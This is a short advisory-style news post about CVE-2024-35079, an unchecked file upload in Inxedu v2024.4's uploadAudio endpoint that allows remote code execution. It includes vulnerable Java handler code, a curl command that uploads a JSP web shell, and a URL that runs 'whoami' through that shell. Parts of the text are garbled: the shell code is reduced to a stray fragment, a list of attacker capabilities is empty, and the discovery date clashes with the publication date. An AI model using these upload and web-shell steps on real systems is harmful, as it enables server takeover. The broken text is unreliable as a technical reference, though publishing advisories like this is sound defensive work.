CVE CyberSecurity Database News

CVE-2024-35079 - Arbitrary File Upload Leads to Remote Code Execution in Inxedu v2024.4

Poster -

In June 2024, a serious security flaw was discovered in Inxedu v2024.4, a widely used educational management system. This vulnerability, now cataloged as CVE-2024-35079, allows attackers to upload dangerous files through the uploadAudio method, leading to remote code execution (RCE). Let’s break down how this vulnerability works, include code examples, and share how attackers might exploit it.

What Is the Issue?

The uploadAudio endpoint in Inxedu v2024.4 is intended for audio file uploads. Unfortunately, the server doesn't strictly check the file type. This means attackers can upload malicious files—for example, a crafted .jsp file that contains Java code. Once uploaded, an attacker can access this file via the web, and the server will run the attacker's code.

Why Is This Bad?

If someone can upload and execute their own code on your server, they totally control it. This type of exploit can allow an attacker to:

Technical Details

The vulnerability stems from poor validation in the uploadAudio method. Let's take a look at what the vulnerable code might look like:

// Simplified example; actual code may differ
@RequestMapping("/upload/audio")
public String uploadAudio(@RequestParam("file") MultipartFile file) {
    String fileName = file.getOriginalFilename();
    File targetFile = new File("/var/www/uploads/", fileName);
    file.transferTo(targetFile);
    return "success";
}

Here, there’s no check to ensure that the file is actually an audio file. Attackers can upload any file they like—and if it’s a .jsp, the server might execute it.

out.flush();

}

`bash

curl -F "file=@shell.jsp" http://target-site.com/upload/audio

`

http://target-site.com/uploads/shell.jsp?cmd=whoami

References and Further Reading

- NVD entry for CVE-2024-35079
- Common File Upload Vulnerabilities
- How to Prevent File Upload Exploits (OWASP)

Conclusion

CVE-2024-35079 is a severe security risk for anyone using Inxedu v2024.4. If you run this software, you must patch your system or apply mitigation steps immediately. Unchecked file upload vulnerabilities often lead to full system compromise, so don't wait until it's too late.

Timeline

Published on: 05/23/2024 19:16:01 UTC
Last modified on: 08/20/2024 15:35:13 UTC